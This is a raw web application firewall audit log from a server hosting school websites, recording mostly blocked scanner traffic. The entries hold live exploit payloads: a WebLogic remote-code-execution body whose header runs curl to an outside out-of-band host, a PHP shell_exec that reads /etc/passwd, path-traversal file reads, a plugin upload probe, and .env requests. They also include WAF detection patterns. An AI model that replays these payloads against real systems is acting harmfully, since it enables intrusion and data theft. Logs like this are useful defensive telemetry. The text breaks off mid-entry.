Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d2e6a5b-Z-- --c04e375b-A-- [29/May/2025:03:09:38 +0700] aDdtghwBHP_x2VCWa061owAAAMY 103.236.140.4 53594 103.236.140.4 8181 --c04e375b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.159.85.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.159.85.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c04e375b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c04e375b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748462978927108 3547 (- - -) Stopwatch2: 1748462978927108 3547; combined=1650, p1=514, p2=1079, p3=0, p4=0, p5=57, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c04e375b-Z-- --ceab482e-A-- [29/May/2025:03:21:07 +0700] aDdwM31Ye2lUDKzW1LvDHgAAABg 103.236.140.4 53886 103.236.140.4 8181 --ceab482e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 179.49.185.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.49.185.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ceab482e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ceab482e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748463667291985 2769 (- - -) Stopwatch2: 1748463667291985 2769; combined=1167, p1=430, p2=704, p3=0, p4=0, p5=32, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ceab482e-Z-- --13febb3b-A-- [29/May/2025:03:47:12 +0700] aDd2UP4vV4CoZ0MKLMPcnQAAAI0 103.236.140.4 54710 103.236.140.4 8181 --13febb3b-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 6 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0 Content-Type: x-application/hessian X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168343337 --13febb3b-C-- cH --13febb3b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --13febb3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748465232709885 5179 (- - -) Stopwatch2: 1748465232709885 5179; combined=3225, p1=841, p2=2286, p3=29, p4=36, p5=33, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13febb3b-Z-- --e385f91b-A-- [29/May/2025:03:47:13 +0700] aDd2Uf4vV4CoZ0MKLMPcowAAAJQ 103.236.140.4 54748 103.236.140.4 8181 --e385f91b-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 1258 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0rjil9gpeoh536h8tf0ox3hqwjr3uy7s.oast.live X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 70943545 --e385f91b-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? 
new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --e385f91b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e385f91b-E-- --e385f91b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748465233747077 2954 (- - -) Stopwatch2: 1748465233747077 2954; combined=924, p1=523, p2=367, p3=0, p4=0, p5=33, sr=84, sw=1, l=0, gc=0 
Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e385f91b-Z-- --f89fb07b-A-- [29/May/2025:03:47:22 +0700] aDd2WsX5pbyFXv2T3ipXGwAAANI 103.236.140.4 54778 103.236.140.4 8181 --f89fb07b-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 140 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/129.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 70943560 --f89fb07b-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --f89fb07b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f89fb07b-E-- --f89fb07b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748465242413387 2579 (- - -) Stopwatch2: 1748465242413387 2579; combined=652, p1=435, p2=186, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f89fb07b-Z-- --ceb78b38-A-- [29/May/2025:03:47:22 +0700] aDd2Wv4vV4CoZ0MKLMPcpwAAAIE 103.236.140.4 54782 103.236.140.4 8181 --ceb78b38-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 608 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 167280706 --ceb78b38-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --ceb78b38-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ceb78b38-E-- --ceb78b38-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. 
[file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748465242419660 4028 (- - -) Stopwatch2: 1748465242419660 4028; combined=2683, p1=377, p2=2278, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ceb78b38-Z-- --6aec164b-A-- [29/May/2025:04:28:22 +0700] aDd_9mMaQtTb69S13pjxbgAAAEI 103.236.140.4 57024 103.236.140.4 8181 --6aec164b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 7 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --6aec164b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6aec164b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748467702122801 894 (- - -) Stopwatch2: 1748467702122801 894; combined=366, p1=321, p2=0, p3=0, p4=0, p5=44, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6aec164b-Z-- --9d679409-A-- [29/May/2025:04:33:06 +0700] aDeBEsX5pbyFXv2T3ipYDQAAAME 103.236.140.4 57176 103.236.140.4 8181 --9d679409-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160924303 --9d679409-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9d679409-E-- --9d679409-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748467986200855 2258 (- - -) Stopwatch2: 1748467986200855 2258; combined=608, p1=454, p2=112, p3=0, p4=0, p5=42, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d679409-Z-- --388f9f7c-A-- [29/May/2025:04:33:17 +0700] aDeBHX1Ye2lUDKzW1LvE8wAAAA8 103.236.140.4 57180 103.236.140.4 8181 --388f9f7c-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 83001966 --388f9f7c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --388f9f7c-E-- --388f9f7c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748467997577241 2638 (- - -) Stopwatch2: 1748467997577241 2638; combined=675, p1=506, p2=135, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --388f9f7c-Z-- --7460113f-A-- [29/May/2025:04:43:58 +0700] aDeDnn1Ye2lUDKzW1LvFFQAAAA8 103.236.140.4 57578 103.236.140.4 8181 --7460113f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 5.161.120.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.161.120.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7460113f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7460113f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748468638055085 2591 (- - -) Stopwatch2: 1748468638055085 2591; combined=1406, p1=488, p2=888, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7460113f-Z-- --9780e451-A-- [29/May/2025:04:45:25 +0700] aDeD9WMaQtTb69S13pjxvAAAAFg 103.236.140.4 57622 103.236.140.4 8181 --9780e451-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1258 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0rjil9gpeoh536h8tf0nq8rs3ff3fokx.oast.live X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 83002158 --9780e451-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = 
req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --9780e451-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9780e451-E-- --9780e451-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748468725233779 3000 (- - -) Stopwatch2: 1748468725233779 3000; combined=945, p1=551, p2=361, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9780e451-Z-- --fc84ab76-A-- [29/May/2025:04:45:25 +0700] aDeD9WMaQtTb69S13pjxvQAAAFQ 103.236.140.4 57626 103.236.140.4 8181 --fc84ab76-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 608 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160591984 --fc84ab76-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --fc84ab76-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc84ab76-E-- --fc84ab76-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. 
[file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748468725761588 4017 (- - -) Stopwatch2: 1748468725761588 4017; combined=2866, p1=357, p2=2481, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc84ab76-Z-- --da57fc72-A-- [29/May/2025:04:45:26 +0700] aDeD9n1Ye2lUDKzW1LvFHwAAAAM 103.236.140.4 57630 103.236.140.4 8181 --da57fc72-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 140 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 83002161 --da57fc72-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --da57fc72-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da57fc72-E-- --da57fc72-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748468726803201 2157 (- - -) Stopwatch2: 1748468726803201 2157; combined=641, p1=439, p2=172, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da57fc72-Z-- --9f2d1d51-A-- [29/May/2025:04:45:27 +0700] aDeD931Ye2lUDKzW1LvFIAAAAAA 103.236.140.4 57642 103.236.140.4 8181 --9f2d1d51-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: 